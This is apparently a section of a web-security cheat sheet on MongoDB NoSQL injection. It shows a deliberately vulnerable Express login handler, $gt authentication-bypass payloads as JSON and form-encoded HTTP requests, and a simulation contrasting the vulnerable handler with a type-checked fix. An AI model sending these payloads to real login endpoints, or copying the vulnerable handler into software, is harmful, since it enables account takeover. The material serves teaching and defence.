## MongoDB

If the source looks like the snippet below, the request body is parsed as JSON and passed straight into the query filter. We therefore control not only the values of `username` and `password` but also their types: a JSON object supplied as the value is interpreted by MongoDB as a query operator rather than as a literal string.

```javascript
// Vulnerable login handler: req.body comes from the JSON body parser and is
// passed unmodified into the filter, so an object such as {"$gt": ""} becomes
// a query operator instead of a string to compare against.
app.post('/', function (req, res) {
    db.users.find({username: req.body.username, password: req.body.password}, function (err, users) {
        // TODO: handle the rest
    });
});
```

### JSON Greater Than overwrite

Using a **Normal request** with the JSON body `{"username": "test", "password": "abc123"}` produces the intended equality filter: both fields are compared against string literals.


But using an **Injection request** with the JSON body `{"username": {"$gt": ""}, "password": {"$gt": ""}}` turns both comparisons into operator expressions.

`$gt` is one of MongoDB's query operators, the greater-than comparison. The condition `{"$gt": ""}` matches any string value that sorts after the empty string, which is every non-empty string, so both the `username` and `password` conditions match every user record and the login check passes for the first user returned.

**Example Request:**
```http
POST http://target/ HTTP/1.1
Content-Type: application/json

{
    "username": {"$gt": ""},
    "password": {"$gt": ""}
}
```

### Form Body Greater Than overwrite

This can also be done with regular form-encoded body parameters.

**Example Request:**
```http
POST http://target/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

username[$gt]=&password[$gt]=
```

The bracket syntax `username[$gt]=` is expanded by the body parser (Express's `urlencoded` parser with `extended: true`, which uses the `qs` library) into the nested object `{"username": {"$gt": ""}}`, so the resulting filter is identical to the JSON version above and again matches every user with a non-empty username and password. With `extended: false` (Node's `querystring` parser) the key stays the literal string `username[$gt]` and this variant does not work.
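The following is an added example, not code from the original page: a self-contained model of how both the JSON and the form-body payloads above end up as `$gt` operators in the filter, and a hardened handler that rejects them. No database is involved; a tiny in-memory matcher stands in for MongoDB's evaluation of `$gt` on string fields, and a small bracket parser stands in for the `qs`-style parsing behind `express.urlencoded({ extended: true })`. The user records are constructed sample data and the function names are this example's own.

```javascript
// Constructed sample collection standing in for db.users (hypothetical data).
const users = [
  { username: 'admin', password: 's3cret!' },
  { username: 'test',  password: 'abc123' },
];

// Stand-in for how MongoDB evaluates one field of a filter: a plain value is an
// equality test, an object containing "$gt" is a comparison. Only string
// comparison is modelled, which is exactly what the {"$gt": ""} payload relies on.
function fieldMatches(stored, criterion) {
  if (criterion !== null && typeof criterion === 'object') {
    if ('$gt' in criterion) {
      return typeof stored === 'string' && stored > criterion.$gt;
    }
    throw new Error('operator not modelled: ' + Object.keys(criterion).join(','));
  }
  return stored === criterion;
}

// Stand-in for collection.find(filter): every key of the filter must match.
function find(collection, filter) {
  return collection.filter(doc =>
    Object.keys(filter).every(k => fieldMatches(doc[k], filter[k])));
}

// Stand-in for the qs-style parser used by express.urlencoded({ extended: true }):
// "username[$gt]=&password[$gt]=" becomes { username: { $gt: '' }, password: { $gt: '' } }.
// Only the single-level key[sub]=value form used on this page is handled.
function parseFormBody(body) {
  const out = {};
  for (const pair of body.split('&')) {
    if (!pair) continue;
    const [rawKey, rawVal = ''] = pair.split('=');
    const key = decodeURIComponent(rawKey);
    const val = decodeURIComponent(rawVal);
    const m = key.match(/^([^\[]+)\[([^\]]*)\]$/);
    if (m) {
      out[m[1]] = out[m[1]] || {};
      out[m[1]][m[2]] = val;
    } else {
      out[key] = val;
    }
  }
  return out;
}

// The vulnerable handler's query, built exactly as in the snippet above:
// whatever the body parser produced goes straight into the filter.
function vulnerableLogin(body) {
  return find(users, { username: body.username, password: body.password });
}

// Hardened variant: both fields must be plain strings before they reach the
// filter, so an object carrying an operator key can never become part of it.
function hardenedLogin(body) {
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    return []; // treated as a failed login
  }
  return find(users, { username, password });
}

// Usage: the normal request, the JSON injection and the form-body injection.
const normal = { username: 'test', password: 'abc123' };
const jsonInject = { username: { $gt: '' }, password: { $gt: '' } };
const formInject = parseFormBody('username[$gt]=&password[$gt]=');

console.log(vulnerableLogin(normal).map(u => u.username));     // ['test']
console.log(vulnerableLogin(jsonInject).map(u => u.username)); // ['admin', 'test']
console.log(vulnerableLogin(formInject).map(u => u.username)); // ['admin', 'test']
console.log(hardenedLogin(jsonInject).length);                  // 0
```

The type check in `hardenedLogin` is the minimal fix; in a real application the same effect is usually obtained with a schema validator or by stripping `$`-prefixed keys from the parsed body before it is used in a query.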

### Other Special operators